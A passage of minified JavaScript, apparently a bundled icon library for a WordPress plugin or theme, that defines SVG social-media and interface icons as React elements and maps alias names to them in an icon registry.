0M12.49 35.12c0 .51-.09.59-.59.59H6.87c-.5 0-.59-.17-.59-.59V16.43c0-.5.09-.67.67-.67h5.03c.42 0 .59.08.59.59-.08 6.28-.08 12.49-.08 18.77m-3.1-22.04a3.583 3.583 0 0 1-3.61-3.61 3.626 3.626 0 0 1 3.61-3.6 3.572 3.572 0 0 1 3.6 3.6 3.692 3.692 0 0 1-3.6 3.61m25.65 22.63h-4.78c-.5 0-.75-.08-.75-.67v-9.3a13.485 13.485 0 0 0-.26-2.6 2.664 2.664 0 0 0-2.43-2.35 3.264 3.264 0 0 0-3.69 1.68 6.537 6.537 0 0 0-.58 2.51v9.98c0 .67-.17.84-.84.75-1.59-.08-3.19 0-4.78 0-.42 0-.59-.17-.59-.59V16.35c0-.42.09-.59.51-.59h4.86c.42 0 .5.17.5.5v2.1a7.617 7.617 0 0 1 3.69-2.77 8.813 8.813 0 0 1 6.2.51 5.948 5.948 0 0 1 3.11 4.44 20.4 20.4 0 0 1 .42 3.94v10.56c.08.59-.09.67-.59.67"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 44 44.26"},(0,a.createElement)("path",{d:"M22.311 0A21.555 21.555 0 0 0 .798 21.6a22.259 22.259 0 0 0 3.01 11.067l-3.807 11.6 11.951-3.805A21.656 21.656 0 0 0 44 21.517 21.687 21.687 0 0 0 22.311 0m10.637 29.915a5.156 5.156 0 0 1-3.487 2.414c-4.559.983-9.387-2.593-12.338-5.633a22.894 22.894 0 0 1-5.275-8.046c-.983-2.861.358-8.583 4.381-7.689.984.179 1.163 1.073 1.431 1.878.447 1.162.8 2.235 1.251 3.4a1.514 1.514 0 0 1 0 .894c-.357.805-1.162 1.341-1.7 2.056-.805 1.252 2.324 4.292 3.218 5.1 1.163 1.072 2.951 2.682 4.56 2.861.894.089 2.056-1.7 2.5-2.325.358-.447.626-.536 1.073-.358 1.52.626 2.951 1.52 4.47 2.325a.811.811 0 0 1 .537.983 3.565 3.565 0 0 1-.626 2.146"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,a.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0M2.724 24a21.149 21.149 0 0 1 1.844-8.657L14.716 43.15A21.283 21.283 0 0 1 2.724 24M24 45.278a21.317 21.317 0 0 1-6.01-.865l6.384-18.55 6.538 17.917a1.806 1.806 0 0 0 .154.293 21.224 21.224 0 0 1-7.066 1.2m2.931-31.249c1.282-.065 2.436-.2 2.436-.2a.88.88 0 0 0-.135-1.754s-3.447.272-5.671.272c-2.09 0-5.6-.272-5.6-.272a.88.88 0 0 0-.133 1.754s1.084.136 2.23.2l3.317 9.084-4.657 13.963-7.754-23.047a42.05 42.05 0 0 0 2.436-.2.88.88 0 0 0-.135-1.754s-3.447.272-5.671.272c-.4 0-.871-.009-1.371-.025a21.273 21.273 0 0 1 32.144-4.006c-.093-.006-.182-.015-.275-.015a3.682 3.682 0 0 0-3.573 3.774c0 1.754 1.01 3.237 2.091 4.991a11.211 11.211 0 0 1 1.754 5.869 24.615 24.615 0 0 1-1.547 7.014l-2.2 6.952Zm7.764 28.366 6.5-18.788a20.025 20.025 0 0 0 1.618-7.62 16.1 16.1 0 0 0-.142-2.189 21.276 21.276 0 0 1-7.974 28.6"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,a.createElement)("g",null,(0,a.createElement)("path",{d:"M4 23.999a20 20 0 0 0 11.272 18L5.732 15.86A19.923 19.923 0 0 0 4 24m33.5-1.009a10.531 10.531 0 0 0-1.646-5.517c-1.014-1.648-1.964-3.042-1.964-4.69a3.463 3.463 0 0 1 3.358-3.55c.089 0 .173.011.259.016A20 20 0 0 0 7.29 13.013c.47.015.912.025 1.288.025 2.091 0 5.33-.254 5.33-.254a.827.827 0 0 1 .128 1.648s-1.084.127-2.289.19l7.283 21.664 4.378-13.127-3.117-8.535c-1.078-.063-2.1-.19-2.1-.19a.827.827 0 0 1 .127-1.648s3.3.254 5.267.254c2.092 0 5.331-.254 5.331-.254a.827.827 0 0 1 .128 1.648s-1.085.127-2.289.19l7.228 21.5 2.063-6.538a23.047 23.047 0 0 0 1.454-6.593m-13.146 2.755-6 17.437a20.006 20.006 0 0 0 12.292-.319 1.835 1.835 0 0 1-.143-.276Zm17.2-11.344a15.342 15.342 0 0 1 .134 2.057 18.884 18.884 0 0 1-1.524 7.163l-6.11 17.661a20 20 0 0 0 7.5-26.881"}),(0,a.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0m0 46.56A22.56 22.56 0 1 1 46.56 24 22.559 22.559 0 0 1 24 46.56"}))),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 33.86"},(0,a.createElement)("path",{d:"M47.134 5.29a5.893 5.893 0 0 0-4.232-4.232C39.055 0 24.05 0 24.05 0S9.044 0 5.293.962A6.146 6.146 0 0 0 .965 5.29C.003 9.041.003 16.929.003 16.929s0 7.887.962 11.638A5.894 5.894 0 0 0 5.197 32.8c3.847 1.058 18.853 1.058 18.853 1.058s15.005 0 18.756-1.058a6.059 6.059 0 0 0 4.232-4.233C48 24.816 48 16.929 48 16.929s.1-7.888-.866-11.639M19.141 21.928v-10a1.237 1.237 0 0 1 1.845-1.077l8.85 5a1.237 1.237 0 0 1 0 2.153l-8.85 5a1.237 1.237 0 0 1-1.845-1.077"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,a.createElement)("path",{d:"M48.004 23.995a24 24 0 0 1-24 24.005 23.735 23.735 0 0 1-10.948-2.65h.086a15.084 15.084 0 0 0 4.8-6.914 35.685 35.685 0 0 0 1.729-7.009v-.192c.1-.384.192-.384.48-.192.1 0 .1.1.192.1a7.385 7.385 0 0 0 4.322 2.112 11.879 11.879 0 0 0 7.491-.96 16.739 16.739 0 0 0 4.513-3.649 11.277 11.277 0 0 0 1-1.354 17.413 17.413 0 0 0 2.574-7.278 16.381 16.381 0 0 0-1.1-8.555 13.1 13.1 0 0 0-4.774-5.569 17.523 17.523 0 0 0-8.067-2.977A20.935 20.935 0 0 0 15.45 4.065a15.91 15.91 0 0 0-9.028 8.258 11.865 11.865 0 0 0-.288 9.89 8.5 8.5 0 0 0 5.859 4.993c.288.1.384 0 .384-.288.192-1.056.384-2.112.576-3.073 0-.192 0-.384-.192-.48a8.869 8.869 0 0 1-1.825-2.688 6.966 6.966 0 0 1 .1-5.377 12.226 12.226 0 0 1 7.875-7.778 14.92 14.92 0 0 1 7.4-.672c5.475.912 7.914 6.625 7.559 11.685a15.147 15.147 0 0 1-2.757 7.423 7.589 7.589 0 0 1-4.129 2.976 5.108 5.108 0 0 1-4.226-.768 2.864 2.864 0 0 1-1.153-2.3 9.668 9.668 0 0 1 .769-3.745c.48-1.44 1.056-2.785 1.44-4.225a10.787 10.787 0 0 0 .384-3.072 3.408 3.408 0 0 0-4.206-2.977 5.336 5.336 0 0 0-2.641 1.364c-1.892 1.785-2.4 5.175-1.6 7.566a7.772 7.772 0 0 1-.1 4.9c-.864 2.976-1.825 6.049-2.5 9.122a28.284 28.284 0 0 0-.672 7.489 8.268 8.268 0 0 0 .576 3.063 24 24 0 1 1 34.949-21.356"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 45.85 48"},(0,a.createElement)("path",{d:"M44.492 25.179a6.625 6.625 0 0 0 .192-7.766 6.482 6.482 0 0 0-9.492-1.151c-.192.1-.288.192-.384.1a28.339 28.339 0 0 0-9.684-2.493c-.192 0-.287-.095-.192-.287.288-.959.672-1.822 1.055-2.781a29.239 29.239 0 0 1 3.068-5.657 7.62 7.62 0 0 1 2.017-1.919 2.338 2.338 0 0 1 2.493 0 6.138 6.138 0 0 1 1.246.959c.192.191.192.287.192.575a3.868 3.868 0 0 0 3.26 4.506 3.786 3.786 0 0 0 4.309-3.739 3.8 3.8 0 0 0-5.463-3.547.358.358 0 0 1-.479-.1 4.481 4.481 0 0 0-1.151-.863 5.486 5.486 0 0 0-6.232-.1 14.609 14.609 0 0 0-3.26 3.643 38.376 38.376 0 0 0-4.123 9.013c-.1.287-.192.383-.479.383a26.861 26.861 0 0 0-10.163 2.493c-.192.1-.288.1-.48-.1a6.631 6.631 0 0 0-8.054-.383 6.539 6.539 0 0 0-1.246 9.4c.192.192.192.288.1.479a13.425 13.425 0 0 0-.959 3.74 14.384 14.384 0 0 0 2.3 8.821 20.414 20.414 0 0 0 7.191 6.519 27.739 27.739 0 0 0 12.752 3.069 27.311 27.311 0 0 0 12.464-2.781 19.211 19.211 0 0 0 7.282-5.933c3.068-4.219 3.835-8.725 1.822-13.615a.865.865 0 0 1 .1-.48m-12.656 5.421a3.645 3.645 0 1 1 3.024-3.023 3.646 3.646 0 0 1-3.024 3.023m-.192 8.1a14.556 14.556 0 0 1-9.013 3.26 14.886 14.886 0 0 1-8.533-3.164 1.469 1.469 0 1 1 1.822-2.3 11.081 11.081 0 0 0 7.862 2.493 11.805 11.805 0 0 0 5.369-2.014c.288-.191.479-.383.767-.575a1.488 1.488 0 0 1 2.014.288 1.6 1.6 0 0 1-.288 2.013m-16.683-15.34a3.646 3.646 0 1 1-3.644 3.643 3.526 3.526 0 0 1 3.644-3.643m-12.464.767a4.959 4.959 0 0 1 7.095-6.808 18.573 18.573 0 0 0-7.095 6.808m41.036-.288a18.259 18.259 0 0 0-6.807-6.424c-.1-.1-.192-.1-.288-.192a5.75 5.75 0 0 1 2.4-.959 4.811 4.811 0 0 1 4.794 2.206 4.978 4.978 0 0 1 .1 5.273c0 .1-.1.384-.192.1"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 47.04 48"},(0,a.createElement)("path",{d:"M24 19.625v8.907h13.227a11.731 11.731 0 0 1-4.907 7.786 14.2 14.2 0 0 1-8.32 2.4 14.447 14.447 0 0 1-13.653-9.973 14.764 14.764 0 0 1-.8-4.747 15.523 15.523 0 0 1 .773-4.746A14.507 14.507 0 0 1 24 9.278a13.3 13.3 0 0 1 9.28 3.574l6.773-6.614A23.061 23.061 0 0 0 24-.002a24 24 0 0 0 0 48 22.873 22.873 0 0 0 15.893-5.813c4.534-4.187 7.147-10.347 7.147-17.653a20.536 20.536 0 0 0-.507-4.907Z"}));const i=new class{constructor(){this.icons=new Map,this.aliases=new Map}initializeIcons(e){Object.entries(e).forEach((([e,t])=>{this.icons.set(e,t)}))}storeAliases(e){Object.entries(e).forEach((([e,t])=>{this.icons.has(t)&&this.aliases.set(e,this.icons.get(t))}))}getAliases(){return Object.fromEntries(this.aliases)}toObject(){return{...Object.fromEntries(this.icons),...Object.fromEntries(this.aliases)}}toCurrentIconObj(){return{...Object.fromEntries(this.icons)}}};i.initializeIcons({...o.c,...r.e}),i.storeAliases({angle_bottom_left_line:"arrow_down_bottom_left_solid",angle_bottom_right_line:"arrow_down_bottom_right_solid",angle_top_left_line:"arrow_up_top_left_solid",angle_top_right_line:"arrow_up_top_right_solid",rightFillAngle:"right_triangle_angle_play_arrow_forward_solid",leftAngle2:"arrow_left_previous_backward_chevron_line",rightAngle2:"arrow_right_next_forward_chevron_line",collapse_bottom_line:"arrow_down_dropdown_maximize_chevron_line",arrowUp2:"arrow_up_dropdown_minimize_chevron_line",longArrowUp2:"long_arrow_up_top_increase_solid",arrow_left_circle_line:"arrow_left_backward_circle_line",arrow_bottom_circle_line:"arrow_down_bottom_downward_circle_line",arrow_right_circle_line:"arrow_right_forward_circle_line",arrow_top_circle_line:"arrow_up_top_upward_circle_line",close_circle_line:"cross_close_x_minimize_circle_line",close_line:"cross_x_close_minimize_line",arrow_down_line:"arrow_down_bottom_downward_line",leftArrowLg:"arrow_left_backward_line",rightArrowLg:"arrow_left_forward_line",arrow_up_line:"long_arrow_up_top_increase_line",down_solid:"arrow_down_bottom_downward_circle_solid",right_solid:"arrow_right_forward_circle_solid",left_solid:"arrow_left_backward_circle_solid",up_solid:"arrow_up_top_upward_circle_solid",wrong_solid:"cross_close_x_minimize_circle_solid",bottom_right_line:"arrow_move_up_right_line",bottom_left_line:"arrow_move_up_left_line",top_left_angle_line:"arrow_move_down_left_line",top_right_line:"arrow_move_down_right_line",at_line:"at_a_mail_line",refresh:"refresh_reset_cycle_loop_infinity_line",cart_line:"shopping_cart_line",cart_solid:"add_plus_shopping_cart_solid",cog_line:"settings_tool_function_line",cog_solid:"settings_tool_function_solid",correct_solid:"right_circle_solid",dot_solid:"dot_circle_solid",clock:"clock_reading_time_1_line.svg",book:"book_line",download_line:"download_1_line",download_solid:"download_1_solid",downlod_bottom_solid:"download_1_solid",eye:"view_count_show_visible_eye_open_2_line",hidden_line:"hidden_hide_invisible_line",home_line:"home_house_line",home_solid:"home_house_solid",location_line:"location_gps_map_line",location_solid:"location_gps_map_solid",love_line:"heart_love_wishlist_favourite_line",love_solid:"heart_love_wishlist_favourite_solid",notice_circle_solid:"warning_circle_solid",notice_solid:"warning_triangle_solid",play_line:"play_media_video_circle_line",plus2:"",videoplay:"right_triangle_angle_play_arrow_forward_solid",left_angle_solid:"left_triangle_angle_arrow_backward_solid",caretArrow:"caret_up_top_triangle_angle_arrow_upward_solid",rectangle_solid:"square_rounded_solid",restriction_line:"restriction_no_stop_line",right_circle_line:"correct_save_check_circle_line",save_line:"correct_save_check_line",search_line:"search_magnify_line",search_solid:"search_magnify_solid",triangle_solid:"triangle_shape_solid",warning_circle_line:"warning_circle_line",warning_triangle_line:"warning_triangle_line",upload_solid:"upload_1_solid",cat1:"category_file_documents_1_solid",cat2:"category_book_line",cat3:"category_file_documents_2_line",cat4:"category_file_documents_3_line",cat5:"category_file_documents_3_solid",cat6:"category_file_documents_4_line",cat7:"category_book_line",commentCount1:"messege_comment_1_line",commentCount2:"messege_comment_3_solid",commentCount3:"messege_comment_3_line",commentCount4:"messege_comment_6_line",commentCount5:"messege_comment_7_line",commentCount6:"messege_comment_8_line",comment:"messege_comment_4_line",date1:"calendar_date_4_line",date2:"calendar_date_1_solid",date3:"calendar_date_2_line",date4:"calendar_date_4_solid",date5:"calendar_date_3_line",calendar:"calendar_date_3_line",readingTime1:"clock_reading_time_3_line",readingTime2:"clock_reading_time_2_line",readingTime3:"book_reading_time_line",readingTime4:"clock_reading_time_1_line",readingTime5:"hourglass_timer_time_line",tag1:"tag_bookmark_save_favourite_mark_discount_sale_line",tag2:"price_tag_label_category_sale_discount_solid",tag3:"price_tag_label_category_sale_discount_line",tag4:"price_tag_offer_sale_coupon_solid",tag5:"price_tag_label_category_sale_discount_line",tag6:"growth_increase_up_solid",viewCount1:"view_count_show_visible_eye_open_1_line",viewCount2:"view_count_show_visible_eye_open_2_line",viewCount3:"view_count_show_visible_eye_open_3_line",viewCount4:"view_count_show_visible_eye_open_4_solid",viewCount5:"view_count_show_visible_eye_open_5_solid",viewCount6:"view_count_show_visible_eye_open_5_solid",author1:"author_user_human_1_line",author2:"author_user_human_4_line",author3:"author_user_human_4_solid",author4:"author_user_human_4_line",author5:"author_user_human_3_solid",user:"author_user_human_3_line",desktop:"desktop_monitor_computer_line",laptop:"laptop_computer_line",tablet:"tablet_ipad_pad_line",mobile:"mobile_smartphone_phone_line",angry_line:"angry_emoji_line",angry_solid:"angry_emoji_solid",confused_line:"confused_emoji_line",confused_solid:"confused_emoji_solid",happy_line:"happy_emoji_line",happy_solid:"happy_emoji_solid",smile_line:"smile_emoji_line",smile_solid:"smile_emoji_solid",share_line:"social_community_line",share:"share_social_solid",apple_solid:"apple_logo_icon_solid",android_solid:"android_logo_icon_solid",google_solid:"google_logo_icon_solid",messenger:"messenger_logo_icon_solid",microsoft_solid:"microsoft_logo_icon_solid",mail:"mail_email_messege_solid",media_document:"media_document",facebook:"facebook_logo_icon_solid",twitter:"twitter_x_logo_icon_line",arrowDown2:"arrow_down_dropdown_maximize_chevron_line",setting:"settings_tool_function_solid",right_circle_solid:"correct_save_check_circle_solid",full_screen:"full_screen_corners_out_solid",zoom_in:"zoom_in_magnifying_glass_plus_line",zoom_out:"zoom_out_magnifying_glass_minus_line",gallery_indicator:"gallery_indicator_image_solid",ascending:"sort_ascending_order_line",descending:"sort_descending_order_line",unlink:"unlink_link_break_line",rocket:"rocket_fly_boost_launch_pro_solid",unlock:"unlocked_open_security_solid",connect:"plugin_connect_socket_integration_line",leftAngle:"arrow_left_previous_backward_chevron_line",rightAngle:"right_triangle_angle_play_arrow_forward_line",link:"link_chains_line",subtract:(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M5 12H19",stroke:"#070707",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),skype:"skype_logo_icon_solid",updated_link:"link_chains_line",tiktok_lite_solid:"tiktok_logo_icon_circle_line",tiktok_solid:"tiktok_logo_icon_solid",instagram_solid:"instagram_logo_icon_solid",linkedin:"linkedin_logo_icon_solid",whatsapp:"whatsapp_logo_icon_solid",wordpress_lite_solid:"wordpress_logo_icon_solid",wordpress_solid:"wordpress_logo_icon_2_solid",youtube_solid:"youtube_logo_icon_solid",pinterest:"pinterest_logo_icon_solid",reddit:"reddit_logo_icon_solid",five_star_line:"star_rating_line",rightAngleBold:"arrow_right_next_forward_chevron_line",leftAngleBold:"arrow_left_previous_backward_chevron_line",reset_left_line:"refresh_reset_cycle_loop_infinity_line",hamicon_1:"hamicon_1_line",hamicon_2:"hemicon_2_line",hamicon_3:"hemicon_3_line",hamicon_4:"hamicon_5_line",hamicon_5:"hemicon_2_solid",hamicon_6:"hamicon_6_line"});const l=i.toObject(),s=((0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M5 12H19",stroke:"#070707",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),l.skype_logo_icon_solid,l.link_chains_line,l.facebook_logo_icon_solid,l.twitter_x_logo_icon_line,l.tiktok_logo_icon_circle_line,l.tiktok_logo_icon_solid,l.instagram_logo_icon_solid,l.linkedin_logo_icon_solid,l.whatsapp_logo_icon_solid,l.wordpress_logo_icon_solid,l.wordpress_logo_icon_2_solid,l.youtube_logo_icon_solid,l.pinterest_logo_icon_solid,l.reddit_logo_icon_solid,l.google_logo_icon_solid,l.link_chains_line,l.share_social_solid,i.toCurrentIconObj(),l)},1900:(e,t,n)=>{"use strict";n.d(t,{e:()=>r});var a=n(7294);const r={add_plus_shopping_cart_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 3h2.128a1 1 0 0 1 .991.863l1.762 12.774a1 1 0 0 0 .99.863H18.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.5 19.25a1.75 1.75 0 1 1-3.5 0 1.75 1.75 0 0 1 3.5 0Zm9.75 0a1.75 1.75 0 1 1-3.5 0 1.75 1.75 0 0 1 3.5 0ZM5.5 5h15.304a1 1 0 0 1 .984 1.177l-1.152 6.403a1 1 0 0 1-.898.82L7 14.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M13.745 7.5v4M11.75 9.505h4"})),android_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6.5 9.5a5.5 5.5 0 1 1 11 0V17a2 2 0 0 1-2 2h-7a2 2 0 0 1-2-2V9.5ZM20 11v6M4 11v6"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"m14 4 1.5-2M10 4 8.5 2m-2 8.5h11m-8 8.5v3m5.5-3v3M10.49 8h.01m2.99 0h.01"})),angry_emoji_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7 9.5c1 0 2.69.254 2.964 1.231m0 0A.988.988 0 0 1 10 11c0 1.5-2.072-.037-.036-.269ZM17 9.5c-1 0-2.69.254-2.964 1.231m0 0A.99.99 0 0 0 14 11c0 1.5 2.072-.037.036-.269Z"}),(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8 17c1.5-3 6.5-3 8 0"})),apple_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M19.489 8.963c-.114.089-2.127 1.23-2.127 3.768 0 2.936 2.561 3.975 2.638 4-.012.064-.407 1.423-1.35 2.808-.841 1.219-1.72 2.435-3.056 2.435-1.337 0-1.68-.781-3.223-.781-1.504 0-2.039.807-3.261.807-1.223 0-2.075-1.128-3.056-2.512C4.918 17.86 4 15.335 4 12.938 4 9.09 6.484 7.05 8.93 7.05c1.298 0 2.381.859 3.197.859.776 0 1.987-.91 3.465-.91.56 0 2.572.051 3.897 1.963ZM14.59 4.415c.533-.64.91-1.527.91-2.415 0-.123-.01-.248-.033-.349-.867.033-1.9.585-2.522 1.315-.489.561-.945 1.45-.945 2.349 0 .135.022.27.033.314.055.01.144.022.233.022.778 0 1.758-.527 2.323-1.236Z"})),arrow_down_bottom_downward_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15.5 13 12 16.5m0 0L8.5 13m3.5 3.5v-9"})),arrow_down_bottom_downward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m3.5 12 8.5 8.5m0 0 8.5-8.5M12 20.5v-17"})),arrow_down_bottom_left_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 6v12m0 0h12M6 18 18 6"})),arrow_down_bottom_right_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M18 6v12m0 0H6m12 0L6 6"})),arrow_down_dropdown_maximize_chevron_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m6 9 6 6 6-6"})),arrow_left_backward_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M11 15.5 7.5 12m0 0L11 8.5M7.5 12h9"})),arrow_left_backward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 20.5 3.5 12m0 0L12 3.5M3.5 12h17"})),arrow_left_forward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m12 20.5 8.5-8.5m0 0L12 3.5m8.5 8.5h-17"})),arrow_left_previous_backward_chevron_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m15 18-6-6 6-6"})),arrow_move_down_left_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 6v3a4 4 0 0 1-4 4H2m0 0 5 5m-5-5 5-5"})),arrow_move_down_right_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 6v3a4 4 0 0 0 4 4h16m0 0-5 5m5-5-5-5"})),arrow_move_up_left_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 18v-3a4 4 0 0 0-4-4H2m0 0 5-5m-5 5 5 5"})),arrow_move_up_right_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 18v-3a4 4 0 0 1 4-4h16m0 0-5-5m5 5-5 5"})),arrow_right_forward_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m13 8.5 3.5 3.5m0 0L13 15.5m3.5-3.5h-9"})),arrow_right_next_forward_chevron_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m9 18 6-6-6-6"})),arrow_up_dropdown_minimize_chevron_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m18 15-6-6-6 6"})),arrow_up_top_left_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 18V6m0 0h12M6 6l12 12"})),arrow_up_top_right_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M18 18V6m0 0H6m12 0L6 18"})),arrow_up_top_upward_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.5 11 12 7.5m0 0 3.5 3.5M12 7.5v9"})),arrow_up_top_upward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3.5 12 12 3.5m0 0 8.5 8.5M12 3.5v17"})),at_a_mail_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16 8v7a2 2 0 0 0 2 2 4 4 0 0 0 4-4v-1c0-5.523-4.477-10-10-10S2 6.477 2 12s4.477 10 10 10c1.821 0 3.53-.487 5-1.338M16 12a4 4 0 1 1-8 0 4 4 0 0 1 8 0Z"})),author_user_human_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 